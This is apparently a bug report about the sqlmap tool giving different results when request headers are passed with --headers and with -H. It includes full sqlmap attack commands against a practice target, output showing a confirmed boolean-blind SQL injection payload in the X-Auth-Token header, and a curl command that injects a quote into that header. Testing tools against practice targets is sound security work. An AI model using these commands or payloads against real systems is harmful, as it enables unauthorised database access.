Description
Describe the bug
Running sqlmap with the --headers and -H parameters gives us different output, although the same header values are provided.
To Reproduce
1. Run 'sqlmap -v 3 --level 5 --risk 3 -u https://pentest-ground.com:9000/widget -X POST --headers="Content-Type: application/json\r\nX-Auth-Token: b191106ea2a7cc74b713e467a4986599*" --data="{\"name\": \"widget1\"}" --ignore-code '*' -b --batch --technique=B'
2. See in the logs
[WARNING] (custom) HEADER parameter 'X-Auth-Token #1*' does not seem to be injectable
and no issues are found.
Expected behavior
Running the same command, but now specifying the headers separately with -H:
sqlmap -v 3 --level 5 --risk 3 -u https://pentest-ground.com:9000/widget -X POST -H "Content-Type: application/json" -H "X-Auth-Token: b191106ea2a7cc74b713e467a4986599*" --data="{\"name\": \"widget1\"}" --ignore-code '*' -b --batch --technique=B
gives the following output:
[INFO] heuristic (basic) test shows that (custom) HEADER parameter 'X-Auth-Token #1*' might be injectable (possible DBMS: 'SQLite')
...
[INFO] (custom) HEADER parameter 'X-Auth-Token #1*' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable (with --code=401)
....
sqlmap identified the following injection point(s) with a total of 1663 HTTP(s) requests:
---
Parameter: X-Auth-Token #1* ((custom) HEADER)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: b191106ea2a7cc74b713e467a4986599' OR NOT 9726=9726-- rwlw
Vector: OR NOT [INFERENCE]
---
Since all headers still have the same values, it is expected that both commands will find the same single boolean-based vulnerability.
Please notice that we explicitly mark the injection point for sqlmap with the "*" asterisk.
Running environment:
- sqlmap version 1.9.4#stable
  Package: sqlmap
  Version: 1.9.4-1
  Maintainer: Debian Security Tools <team+pkg-security@tracker.debian.org>
  APT-Sources: http://http.kali.org/kali kali-rolling/main amd64 Packages
- Installation method: apt-get
- Operating system: Kali Linux
- Python version: 3.13.2
Target details:
- DBMS: sqlite3
- SQLi techniques found by sqlmap: only boolean-based
- WAF/IPS: not sure
- Relevant console output: none beyond the above
- Exception traceback: (not provided)
Additional context
Target details can be obtained here: https://pentest-ground.com:9000/help
The tested endpoint is supposed to be boolean-based vulnerable, so no other techniques are needed to verify it.
Running an all-techniques scan gives the same result (only one boolean-based vulnerability).
The vulnerable header is X-Auth-Token, and this can be verified with a simple quote injection in its value:
curl -k -X POST https://pentest-ground.com:9000/widget \
-H "Accept-Encoding: gzip, deflate, br" \
-H "Accept: */*" \
-H "Accept-Language: en-US;q=0.9,en;q=0.8" \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" \
-H "Connection: close" \
-H "Cache-Control: max-age=0" \
-H "X-Auth-Token: THISISATOKEN'" \
-H "Content-Type: application/json" \
-d '{"name":"widget1"}'
It immediately throws a sqlite3.OperationalError trace into the output.